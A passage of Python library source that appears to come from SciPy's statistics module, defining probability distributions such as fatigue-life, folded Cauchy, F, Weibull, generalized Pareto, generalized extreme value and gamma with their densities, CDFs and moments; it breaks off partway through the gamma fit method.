class fatiguelife_gen(rv_continuous):
r"""A fatigue-life (Birnbaum-Saunders) continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `fatiguelife` is:
.. math::
f(x, c) = \frac{x+1}{2c\sqrt{2\pi x^3}} \exp(-\frac{(x-1)^2}{2x c^2})
for :math:`x >= 0` and :math:`c > 0`.
`fatiguelife` takes ``c`` as a shape parameter for :math:`c`.
%(after_notes)s
References
----------
.. [1] "Birnbaum-Saunders distribution",
https://en.wikipedia.org/wiki/Birnbaum-Saunders_distribution
%(example)s
"""
_support_mask = rv_continuous._open_support_mask
def _rvs(self, c):
z = self._random_state.standard_normal(self._size)
x = 0.5*c*z
x2 = x*x
t = 1.0 + 2*x2 + 2*x*np.sqrt(1 + x2)
return t
def _pdf(self, x, c):
# fatiguelife.pdf(x, c) =
# (x+1) / (2*c*sqrt(2*pi*x**3)) * exp(-(x-1)**2/(2*x*c**2))
return np.exp(self._logpdf(x, c))
def _logpdf(self, x, c):
return (np.log(x+1) - (x-1)**2 / (2.0*x*c**2) - np.log(2*c) -
0.5*(np.log(2*np.pi) + 3*np.log(x)))
def _cdf(self, x, c):
return _norm_cdf(1.0 / c * (np.sqrt(x) - 1.0/np.sqrt(x)))
def _ppf(self, q, c):
tmp = c*sc.ndtri(q)
return 0.25 * (tmp + np.sqrt(tmp**2 + 4))**2
def _stats(self, c):
# NB: the formula for kurtosis in wikipedia seems to have an error:
# it's 40, not 41. At least it disagrees with the one from Wolfram
# Alpha. And the latter one, below, passes the tests, while the wiki
# one doesn't So far I didn't have the guts to actually check the
# coefficients from the expressions for the raw moments.
c2 = c*c
mu = c2 / 2.0 + 1.0
den = 5.0 * c2 + 4.0
mu2 = c2*den / 4.0
g1 = 4 * c * (11*c2 + 6.0) / np.power(den, 1.5)
g2 = 6 * c2 * (93*c2 + 40.0) / den**2.0
return mu, mu2, g1, g2
fatiguelife = fatiguelife_gen(a=0.0, name='fatiguelife')
class foldcauchy_gen(rv_continuous):
r"""A folded Cauchy continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `foldcauchy` is:
.. math::
f(x, c) = \frac{1}{\pi (1+(x-c)^2)} + \frac{1}{\pi (1+(x+c)^2)}
for :math:`x \ge 0`.
`foldcauchy` takes ``c`` as a shape parameter for :math:`c`.
%(example)s
"""
def _rvs(self, c):
return abs(cauchy.rvs(loc=c, size=self._size,
random_state=self._random_state))
def _pdf(self, x, c):
# foldcauchy.pdf(x, c) = 1/(pi*(1+(x-c)**2)) + 1/(pi*(1+(x+c)**2))
return 1.0/np.pi*(1.0/(1+(x-c)**2) + 1.0/(1+(x+c)**2))
def _cdf(self, x, c):
return 1.0/np.pi*(np.arctan(x-c) + np.arctan(x+c))
def _stats(self, c):
return np.inf, np.inf, np.nan, np.nan
foldcauchy = foldcauchy_gen(a=0.0, name='foldcauchy')
class f_gen(rv_continuous):
r"""An F continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `f` is:
.. math::
f(x, df_1, df_2) = \frac{df_2^{df_2/2} df_1^{df_1/2} x^{df_1 / 2-1}}
{(df_2+df_1 x)^{(df_1+df_2)/2}
B(df_1/2, df_2/2)}
for :math:`x > 0`.
`f` takes ``dfn`` and ``dfd`` as shape parameters.
%(after_notes)s
%(example)s
"""
def _rvs(self, dfn, dfd):
return self._random_state.f(dfn, dfd, self._size)
def _pdf(self, x, dfn, dfd):
# df2**(df2/2) * df1**(df1/2) * x**(df1/2-1)
# F.pdf(x, df1, df2) = --------------------------------------------
# (df2+df1*x)**((df1+df2)/2) * B(df1/2, df2/2)
return np.exp(self._logpdf(x, dfn, dfd))
def _logpdf(self, x, dfn, dfd):
n = 1.0 * dfn
m = 1.0 * dfd
lPx = m/2 * np.log(m) + n/2 * np.log(n) + sc.xlogy(n/2 - 1, x)
lPx -= ((n+m)/2) * np.log(m + n*x) + sc.betaln(n/2, m/2)
return lPx
def _cdf(self, x, dfn, dfd):
return sc.fdtr(dfn, dfd, x)
def _sf(self, x, dfn, dfd):
return sc.fdtrc(dfn, dfd, x)
def _ppf(self, q, dfn, dfd):
return sc.fdtri(dfn, dfd, q)
def _stats(self, dfn, dfd):
v1, v2 = 1. * dfn, 1. * dfd
v2_2, v2_4, v2_6, v2_8 = v2 - 2., v2 - 4., v2 - 6., v2 - 8.
mu = _lazywhere(
v2 > 2, (v2, v2_2),
lambda v2, v2_2: v2 / v2_2,
np.inf)
mu2 = _lazywhere(
v2 > 4, (v1, v2, v2_2, v2_4),
lambda v1, v2, v2_2, v2_4:
2 * v2 * v2 * (v1 + v2_2) / (v1 * v2_2**2 * v2_4),
np.inf)
g1 = _lazywhere(
v2 > 6, (v1, v2_2, v2_4, v2_6),
lambda v1, v2_2, v2_4, v2_6:
(2 * v1 + v2_2) / v2_6 * np.sqrt(v2_4 / (v1 * (v1 + v2_2))),
np.nan)
g1 *= np.sqrt(8.)
g2 = _lazywhere(
v2 > 8, (g1, v2_6, v2_8),
lambda g1, v2_6, v2_8: (8 + g1 * g1 * v2_6) / v2_8,
np.nan)
g2 *= 3. / 2.
return mu, mu2, g1, g2
f = f_gen(a=0.0, name='f')
## Folded Normal
## abs(Z) where (Z is normal with mu=L and std=S so that c=abs(L)/S)
##
## note: regress docs have scale parameter correct, but first parameter
## he gives is a shape parameter A = c * scale
## Half-normal is folded normal with shape-parameter c=0.
class foldnorm_gen(rv_continuous):
r"""A folded normal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `foldnorm` is:
.. math::
f(x, c) = \sqrt{2/\pi} cosh(c x) \exp(-\frac{x^2+c^2}{2})
for :math:`c \ge 0`.
`foldnorm` takes ``c`` as a shape parameter for :math:`c`.
%(after_notes)s
%(example)s
"""
def _argcheck(self, c):
return c >= 0
def _rvs(self, c):
return abs(self._random_state.standard_normal(self._size) + c)
def _pdf(self, x, c):
# foldnormal.pdf(x, c) = sqrt(2/pi) * cosh(c*x) * exp(-(x**2+c**2)/2)
return _norm_pdf(x + c) + _norm_pdf(x-c)
def _cdf(self, x, c):
return _norm_cdf(x-c) + _norm_cdf(x+c) - 1.0
def _stats(self, c):
# Regina C. Elandt, Technometrics 3, 551 (1961)
# https://www.jstor.org/stable/1266561
#
c2 = c*c
expfac = np.exp(-0.5*c2) / np.sqrt(2.*np.pi)
mu = 2.*expfac + c * sc.erf(c/np.sqrt(2))
mu2 = c2 + 1 - mu*mu
g1 = 2. * (mu*mu*mu - c2*mu - expfac)
g1 /= np.power(mu2, 1.5)
g2 = c2 * (c2 + 6.) + 3 + 8.*expfac*mu
g2 += (2. * (c2 - 3.) - 3. * mu**2) * mu**2
g2 = g2 / mu2**2.0 - 3.
return mu, mu2, g1, g2
foldnorm = foldnorm_gen(a=0.0, name='foldnorm')
class weibull_min_gen(rv_continuous):
r"""Weibull minimum continuous random variable.
The Weibull Minimum Extreme Value distribution, from extreme value theory,
is also often simply called the Weibull distribution.
%(before_notes)s
See Also
--------
weibull_max, numpy.random.mtrand.RandomState.weibull, exponweib
Notes
-----
The probability density function for `weibull_min` is:
.. math::
f(x, c) = c x^{c-1} \exp(-x^c)
for :math:`x >= 0`, :math:`c > 0`.
`weibull_min` takes ``c`` as a shape parameter for :math:`c`.
(named :math:`k` in Wikipedia article and :math:`a` in
``numpy.random.weibull``). Special shape values are :math:`c=1` and
:math:`c=2` where Weibull distribution reduces to the `expon` and
`rayleigh` distributions respectively.
%(after_notes)s
References
----------
https://en.wikipedia.org/wiki/Weibull_distribution
%(example)s
"""
def _pdf(self, x, c):
# frechet_r.pdf(x, c) = c * x**(c-1) * exp(-x**c)
return c*pow(x, c-1)*np.exp(-pow(x, c))
def _logpdf(self, x, c):
return np.log(c) + sc.xlogy(c - 1, x) - pow(x, c)
def _cdf(self, x, c):
return -sc.expm1(-pow(x, c))
def _sf(self, x, c):
return np.exp(-pow(x, c))
def _logsf(self, x, c):
return -pow(x, c)
def _ppf(self, q, c):
return pow(-sc.log1p(-q), 1.0/c)
def _munp(self, n, c):
return sc.gamma(1.0+n*1.0/c)
def _entropy(self, c):
return -_EULER / c - np.log(c) + _EULER + 1
weibull_min = weibull_min_gen(a=0.0, name='weibull_min')
class weibull_max_gen(rv_continuous):
r"""Weibull maximum continuous random variable.
%(before_notes)s
See Also
--------
weibull_min
Notes
-----
The probability density function for `weibull_max` is:
.. math::
f(x, c) = c (-x)^{c-1} \exp(-(-x)^c)
for :math:`x < 0`, :math:`c > 0`.
`weibull_max` takes ``c`` as a shape parameter for :math:`c`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x, c):
# frechet_l.pdf(x, c) = c * (-x)**(c-1) * exp(-(-x)**c)
return c*pow(-x, c-1)*np.exp(-pow(-x, c))
def _logpdf(self, x, c):
return np.log(c) + sc.xlogy(c-1, -x) - pow(-x, c)
def _cdf(self, x, c):
return np.exp(-pow(-x, c))
def _logcdf(self, x, c):
return -pow(-x, c)
def _sf(self, x, c):
return -sc.expm1(-pow(-x, c))
def _ppf(self, q, c):
return -pow(-np.log(q), 1.0/c)
def _munp(self, n, c):
val = sc.gamma(1.0+n*1.0/c)
if int(n) % 2:
sgn = -1
else:
sgn = 1
return sgn * val
def _entropy(self, c):
return -_EULER / c - np.log(c) + _EULER + 1
weibull_max = weibull_max_gen(b=0.0, name='weibull_max')
# Public methods to be deprecated in frechet_r and frechet_l:
# ['__call__', 'cdf', 'entropy', 'expect', 'fit', 'fit_loc_scale', 'freeze',
# 'interval', 'isf', 'logcdf', 'logpdf', 'logsf', 'mean', 'median', 'moment',
# 'nnlf', 'pdf', 'ppf', 'rvs', 'sf', 'stats', 'std', 'var']
_frechet_r_deprec_msg = """\
The distribution `frechet_r` is a synonym for `weibull_min`; this historical
usage is deprecated because of possible confusion with the (quite different)
Frechet distribution. To preserve the existing behavior of the program, use
`scipy.stats.weibull_min`. For the Frechet distribution (i.e. the Type II
extreme value distribution), use `scipy.stats.invweibull`."""
class frechet_r_gen(weibull_min_gen):
"""A Frechet right (or Weibull minimum) continuous random variable.
%(before_notes)s
See Also
--------
weibull_min : The same distribution as `frechet_r`.
Notes
-----
%(after_notes)s
%(example)s
"""
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def __call__(self, *args, **kwargs):
return weibull_min_gen.__call__(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def cdf(self, *args, **kwargs):
return weibull_min_gen.cdf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def entropy(self, *args, **kwargs):
return weibull_min_gen.entropy(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def expect(self, *args, **kwargs):
return weibull_min_gen.expect(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def fit(self, *args, **kwargs):
return weibull_min_gen.fit(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def fit_loc_scale(self, *args, **kwargs):
return weibull_min_gen.fit_loc_scale(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def freeze(self, *args, **kwargs):
return weibull_min_gen.freeze(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def interval(self, *args, **kwargs):
return weibull_min_gen.interval(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def isf(self, *args, **kwargs):
return weibull_min_gen.isf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def logcdf(self, *args, **kwargs):
return weibull_min_gen.logcdf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def logpdf(self, *args, **kwargs):
return weibull_min_gen.logpdf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def logsf(self, *args, **kwargs):
return weibull_min_gen.logsf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def mean(self, *args, **kwargs):
return weibull_min_gen.mean(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def median(self, *args, **kwargs):
return weibull_min_gen.median(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def moment(self, *args, **kwargs):
return weibull_min_gen.moment(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def nnlf(self, *args, **kwargs):
return weibull_min_gen.nnlf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def pdf(self, *args, **kwargs):
return weibull_min_gen.pdf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def ppf(self, *args, **kwargs):
return weibull_min_gen.ppf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def rvs(self, *args, **kwargs):
return weibull_min_gen.rvs(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def sf(self, *args, **kwargs):
return weibull_min_gen.sf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def stats(self, *args, **kwargs):
return weibull_min_gen.stats(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def std(self, *args, **kwargs):
return weibull_min_gen.std(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def var(self, *args, **kwargs):
return weibull_min_gen.var(self, *args, **kwargs)
frechet_r = frechet_r_gen(a=0.0, name='frechet_r')
_frechet_l_deprec_msg = """\
The distribution `frechet_l` is a synonym for `weibull_max`; this historical
usage is deprecated because of possible confusion with the (quite different)
Frechet distribution. To preserve the existing behavior of the program, use
`scipy.stats.weibull_max`. For the Frechet distribution (i.e. the Type II
extreme value distribution), use `scipy.stats.invweibull`."""
class frechet_l_gen(weibull_max_gen):
"""A Frechet left (or Weibull maximum) continuous random variable.
%(before_notes)s
See Also
--------
weibull_max : The same distribution as `frechet_l`.
Notes
-----
%(after_notes)s
%(example)s
"""
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def __call__(self, *args, **kwargs):
return weibull_max_gen.__call__(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def cdf(self, *args, **kwargs):
return weibull_max_gen.cdf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def entropy(self, *args, **kwargs):
return weibull_max_gen.entropy(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def expect(self, *args, **kwargs):
return weibull_max_gen.expect(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def fit(self, *args, **kwargs):
return weibull_max_gen.fit(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def fit_loc_scale(self, *args, **kwargs):
return weibull_max_gen.fit_loc_scale(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def freeze(self, *args, **kwargs):
return weibull_max_gen.freeze(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def interval(self, *args, **kwargs):
return weibull_max_gen.interval(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def isf(self, *args, **kwargs):
return weibull_max_gen.isf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def logcdf(self, *args, **kwargs):
return weibull_max_gen.logcdf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def logpdf(self, *args, **kwargs):
return weibull_max_gen.logpdf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def logsf(self, *args, **kwargs):
return weibull_max_gen.logsf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def mean(self, *args, **kwargs):
return weibull_max_gen.mean(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def median(self, *args, **kwargs):
return weibull_max_gen.median(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def moment(self, *args, **kwargs):
return weibull_max_gen.moment(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def nnlf(self, *args, **kwargs):
return weibull_max_gen.nnlf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def pdf(self, *args, **kwargs):
return weibull_max_gen.pdf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def ppf(self, *args, **kwargs):
return weibull_max_gen.ppf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def rvs(self, *args, **kwargs):
return weibull_max_gen.rvs(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def sf(self, *args, **kwargs):
return weibull_max_gen.sf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def stats(self, *args, **kwargs):
return weibull_max_gen.stats(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def std(self, *args, **kwargs):
return weibull_max_gen.std(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def var(self, *args, **kwargs):
return weibull_max_gen.var(self, *args, **kwargs)
frechet_l = frechet_l_gen(b=0.0, name='frechet_l')
class genlogistic_gen(rv_continuous):
r"""A generalized logistic continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `genlogistic` is:
.. math::
f(x, c) = c \frac{\exp(-x)}
{(1 + \exp(-x))^{c+1}}
for :math:`x >= 0`, :math:`c > 0`.
`genlogistic` takes ``c`` as a shape parameter for :math:`c`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x, c):
# genlogistic.pdf(x, c) = c * exp(-x) / (1 + exp(-x))**(c+1)
return np.exp(self._logpdf(x, c))
def _logpdf(self, x, c):
return np.log(c) - x - (c+1.0)*sc.log1p(np.exp(-x))
def _cdf(self, x, c):
Cx = (1+np.exp(-x))**(-c)
return Cx
def _ppf(self, q, c):
vals = -np.log(pow(q, -1.0/c)-1)
return vals
def _stats(self, c):
mu = _EULER + sc.psi(c)
mu2 = np.pi*np.pi/6.0 + sc.zeta(2, c)
g1 = -2*sc.zeta(3, c) + 2*_ZETA3
g1 /= np.power(mu2, 1.5)
g2 = np.pi**4/15.0 + 6*sc.zeta(4, c)
g2 /= mu2**2.0
return mu, mu2, g1, g2
genlogistic = genlogistic_gen(name='genlogistic')
class genpareto_gen(rv_continuous):
r"""A generalized Pareto continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `genpareto` is:
.. math::
f(x, c) = (1 + c x)^{-1 - 1/c}
defined for :math:`x \ge 0` if :math:`c \ge 0`, and for
:math:`0 \le x \le -1/c` if :math:`c < 0`.
`genpareto` takes ``c`` as a shape parameter for :math:`c`.
For :math:`c=0`, `genpareto` reduces to the exponential
distribution, `expon`:
.. math::
f(x, 0) = \exp(-x)
For :math:`c=-1`, `genpareto` is uniform on ``[0, 1]``:
.. math::
f(x, -1) = 1
%(after_notes)s
%(example)s
"""
def _argcheck(self, c):
return np.isfinite(c)
def _get_support(self, c):
c = np.asarray(c)
b = _lazywhere(c < 0, (c,),
lambda c: -1. / c,
np.inf)
a = np.where(c >= 0, self.a, self.a)
return a, b
def _pdf(self, x, c):
# genpareto.pdf(x, c) = (1 + c * x)**(-1 - 1/c)
return np.exp(self._logpdf(x, c))
def _logpdf(self, x, c):
return _lazywhere((x == x) & (c != 0), (x, c),
lambda x, c: -sc.xlog1py(c + 1., c*x) / c,
-x)
def _cdf(self, x, c):
return -sc.inv_boxcox1p(-x, -c)
def _sf(self, x, c):
return sc.inv_boxcox(-x, -c)
def _logsf(self, x, c):
return _lazywhere((x == x) & (c != 0), (x, c),
lambda x, c: -sc.log1p(c*x) / c,
-x)
def _ppf(self, q, c):
return -sc.boxcox1p(-q, -c)
def _isf(self, q, c):
return -sc.boxcox(q, -c)
def _munp(self, n, c):
def __munp(n, c):
val = 0.0
k = np.arange(0, n + 1)
for ki, cnk in zip(k, sc.comb(n, k)):
val = val + cnk * (-1) ** ki / (1.0 - c * ki)
return np.where(c * n < 1, val * (-1.0 / c) ** n, np.inf)
return _lazywhere(c != 0, (c,),
lambda c: __munp(n, c),
sc.gamma(n + 1))
def _entropy(self, c):
return 1. + c
genpareto = genpareto_gen(a=0.0, name='genpareto')
class genexpon_gen(rv_continuous):
r"""A generalized exponential continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `genexpon` is:
.. math::
f(x, a, b, c) = (a + b (1 - \exp(-c x)))
\exp(-a x - b x + \frac{b}{c} (1-\exp(-c x)))
for :math:`x \ge 0`, :math:`a, b, c > 0`.
`genexpon` takes :math:`a`, :math:`b` and :math:`c` as shape parameters.
%(after_notes)s
References
----------
H.K. Ryu, "An Extension of Marshall and Olkin's Bivariate Exponential
Distribution", Journal of the American Statistical Association, 1993.
N. Balakrishnan, "The Exponential Distribution: Theory, Methods and
Applications", Asit P. Basu.
%(example)s
"""
def _pdf(self, x, a, b, c):
# genexpon.pdf(x, a, b, c) = (a + b * (1 - exp(-c*x))) * \
# exp(-a*x - b*x + b/c * (1-exp(-c*x)))
return (a + b*(-sc.expm1(-c*x)))*np.exp((-a-b)*x +
b*(-sc.expm1(-c*x))/c)
def _cdf(self, x, a, b, c):
return -sc.expm1((-a-b)*x + b*(-sc.expm1(-c*x))/c)
def _logpdf(self, x, a, b, c):
return np.log(a+b*(-sc.expm1(-c*x))) + (-a-b)*x+b*(-sc.expm1(-c*x))/c
genexpon = genexpon_gen(a=0.0, name='genexpon')
class genextreme_gen(rv_continuous):
r"""A generalized extreme value continuous random variable.
%(before_notes)s
See Also
--------
gumbel_r
Notes
-----
For :math:`c=0`, `genextreme` is equal to `gumbel_r`.
The probability density function for `genextreme` is:
.. math::
f(x, c) = \begin{cases}
\exp(-\exp(-x)) \exp(-x) &\text{for } c = 0\\
\exp(-(1-c x)^{1/c}) (1-c x)^{1/c-1} &\text{for }
x \le 1/c, c > 0
\end{cases}
Note that several sources and software packages use the opposite
convention for the sign of the shape parameter :math:`c`.
`genextreme` takes ``c`` as a shape parameter for :math:`c`.
%(after_notes)s
%(example)s
"""
def _argcheck(self, c):
return np.where(abs(c) == np.inf, 0, 1)
def _get_support(self, c):
_b = np.where(c > 0, 1.0 / np.maximum(c, _XMIN), np.inf)
_a = np.where(c < 0, 1.0 / np.minimum(c, -_XMIN), -np.inf)
return _a, _b
def _loglogcdf(self, x, c):
return _lazywhere((x == x) & (c != 0), (x, c),
lambda x, c: sc.log1p(-c*x)/c, -x)
def _pdf(self, x, c):
# genextreme.pdf(x, c) =
# exp(-exp(-x))*exp(-x), for c==0
# exp(-(1-c*x)**(1/c))*(1-c*x)**(1/c-1), for x \le 1/c, c > 0
return np.exp(self._logpdf(x, c))
def _logpdf(self, x, c):
cx = _lazywhere((x == x) & (c != 0), (x, c), lambda x, c: c*x, 0.0)
logex2 = sc.log1p(-cx)
logpex2 = self._loglogcdf(x, c)
pex2 = np.exp(logpex2)
# Handle special cases
np.putmask(logpex2, (c == 0) & (x == -np.inf), 0.0)
logpdf = np.where((cx == 1) | (cx == -np.inf),
-np.inf,
-pex2+logpex2-logex2)
np.putmask(logpdf, (c == 1) & (x == 1), 0.0)
return logpdf
def _logcdf(self, x, c):
return -np.exp(self._loglogcdf(x, c))
def _cdf(self, x, c):
return np.exp(self._logcdf(x, c))
def _sf(self, x, c):
return -sc.expm1(self._logcdf(x, c))
def _ppf(self, q, c):
x = -np.log(-np.log(q))
return _lazywhere((x == x) & (c != 0), (x, c),
lambda x, c: -sc.expm1(-c * x) / c, x)
def _isf(self, q, c):
x = -np.log(-sc.log1p(-q))
return _lazywhere((x == x) & (c != 0), (x, c),
lambda x, c: -sc.expm1(-c * x) / c, x)
def _stats(self, c):
g = lambda n: sc.gamma(n*c + 1)
g1 = g(1)
g2 = g(2)
g3 = g(3)
g4 = g(4)
g2mg12 = np.where(abs(c) < 1e-7, (c*np.pi)**2.0/6.0, g2-g1**2.0)
gam2k = np.where(abs(c) < 1e-7, np.pi**2.0/6.0,
sc.expm1(sc.gammaln(2.0*c+1.0)-2*sc.gammaln(c + 1.0))/c**2.0)
eps = 1e-14
gamk = np.where(abs(c) < eps, -_EULER, sc.expm1(sc.gammaln(c + 1))/c)
m = np.where(c < -1.0, np.nan, -gamk)
v = np.where(c < -0.5, np.nan, g1**2.0*gam2k)
# skewness
sk1 = _lazywhere(c >= -1./3,
(c, g1, g2, g3, g2mg12),
lambda c, g1, g2, g3, g2gm12:
np.sign(c)*(-g3 + (g2 + 2*g2mg12)*g1)/g2mg12**1.5,
fillvalue=np.nan)
sk = np.where(abs(c) <= eps**0.29, 12*np.sqrt(6)*_ZETA3/np.pi**3, sk1)
# kurtosis
ku1 = _lazywhere(c >= -1./4,
(g1, g2, g3, g4, g2mg12),
lambda g1, g2, g3, g4, g2mg12:
(g4 + (-4*g3 + 3*(g2 + g2mg12)*g1)*g1)/g2mg12**2,
fillvalue=np.nan)
ku = np.where(abs(c) <= (eps)**0.23, 12.0/5.0, ku1-3.0)
return m, v, sk, ku
def _fitstart(self, data):
# This is better than the default shape of (1,).
g = _skew(data)
if g < 0:
a = 0.5
else:
a = -0.5
return super(genextreme_gen, self)._fitstart(data, args=(a,))
def _munp(self, n, c):
k = np.arange(0, n+1)
vals = 1.0/c**n * np.sum(
sc.comb(n, k) * (-1)**k * sc.gamma(c*k + 1),
axis=0)
return np.where(c*n > -1, vals, np.inf)
def _entropy(self, c):
return _EULER*(1 - c) + 1
genextreme = genextreme_gen(name='genextreme')
def _digammainv(y):
# Inverse of the digamma function (real positive arguments only).
# This function is used in the `fit` method of `gamma_gen`.
# The function uses either optimize.fsolve or optimize.newton
# to solve `sc.digamma(x) - y = 0`. There is probably room for
# improvement, but currently it works over a wide range of y:
# >>> y = 64*np.random.randn(1000000)
# >>> y.min(), y.max()
# (-311.43592651416662, 351.77388222276869)
# x = [_digammainv(t) for t in y]
# np.abs(sc.digamma(x) - y).max()
# 1.1368683772161603e-13
#
_em = 0.5772156649015328606065120
func = lambda x: sc.digamma(x) - y
if y > -0.125:
x0 = np.exp(y) + 0.5
if y < 10:
# Some experimentation shows that newton reliably converges
# must faster than fsolve in this y range. For larger y,
# newton sometimes fails to converge.
value = optimize.newton(func, x0, tol=1e-10)
return value
elif y > -3:
x0 = np.exp(y/2.332) + 0.08661
else:
x0 = 1.0 / (-y - _em)
value, info, ier, mesg = optimize.fsolve(func, x0, xtol=1e-11,
full_output=True)
if ier != 1:
raise RuntimeError("_digammainv: fsolve failed, y = %r" % y)
return value[0]
## Gamma (Use MATLAB and MATHEMATICA (b=theta=scale, a=alpha=shape) definition)
## gamma(a, loc, scale) with a an integer is the Erlang distribution
## gamma(1, loc, scale) is the Exponential distribution
## gamma(df/2, 0, 2) is the chi2 distribution with df degrees of freedom.
class gamma_gen(rv_continuous):
r"""A gamma continuous random variable.
%(before_notes)s
See Also
--------
erlang, expon
Notes
-----
The probability density function for `gamma` is:
.. math::
f(x, a) = \frac{x^{a-1} \exp(-x)}{\Gamma(a)}
for :math:`x \ge 0`, :math:`a > 0`. Here :math:`\Gamma(a)` refers to the
gamma function.
`gamma` takes ``a`` as a shape parameter for :math:`a`.
When :math:`a` is an integer, `gamma` reduces to the Erlang
distribution, and when :math:`a=1` to the exponential distribution.
%(after_notes)s
%(example)s
"""
def _rvs(self, a):
return self._random_state.standard_gamma(a, self._size)
def _pdf(self, x, a):
# gamma.pdf(x, a) = x**(a-1) * exp(-x) / gamma(a)
return np.exp(self._logpdf(x, a))
def _logpdf(self, x, a):
return sc.xlogy(a-1.0, x) - x - sc.gammaln(a)
def _cdf(self, x, a):
return sc.gammainc(a, x)
def _sf(self, x, a):
return sc.gammaincc(a, x)
def _ppf(self, q, a):
return sc.gammaincinv(a, q)
def _stats(self, a):
return a, a, 2.0/np.sqrt(a), 6.0/a
def _entropy(self, a):
return sc.psi(a)*(1-a) + a + sc.gammaln(a)
def _fitstart(self, data):
# The skewness of the gamma distribution is `4 / np.sqrt(a)`.
# We invert that to estimate the shape `a` using the skewness
# of the data. The formula is regularized with 1e-8 in the
# denominator to allow for degenerate data where the skewness
# is close to 0.
a = 4 / (1e-8 + _skew(data)**2)
return super(gamma_gen, self)._fitstart(data, args=(a,))
@extend_notes_in_docstring(rv_continuous, notes="""\
When the location is fixed by using the argument `floc`, this
function uses explicit formulas or solves a simpler numerical
problem than the full ML optimization problem. So in that case,
the `optimizer`, `loc` and `scale` arguments are ignored.\n\n""")
def fit(self, data, *args, **kwds):
floc = kwds.get('floc', None)
if floc is None:
# loc is not fixed. Use the default fit method.
return super(gamma_gen, self).fit(data, *args, **kwds)
# We already have this value, so just pop it from kwds.
kwds.pop('floc', None)
f0 = _get_fixed_fit_value(kwds, ['f0', 'fa', 'fix_a'])
fscale = kwds.pop('fscale', None)
_remove_optimizer_parameters(kwds)
# Special case: loc is fixed.
if f0 is not None and fscale is not None:
# This check is for consistency with `rv_continuous.fit`.
# Without this check, this function would just return the
# parameters that were given.
raise ValueError("All parameters fixed. There is nothing to "
"optimize.")
# Fixed location is handled by shifting the data.
data = np.asarray(data)
if np.any(data <= floc):
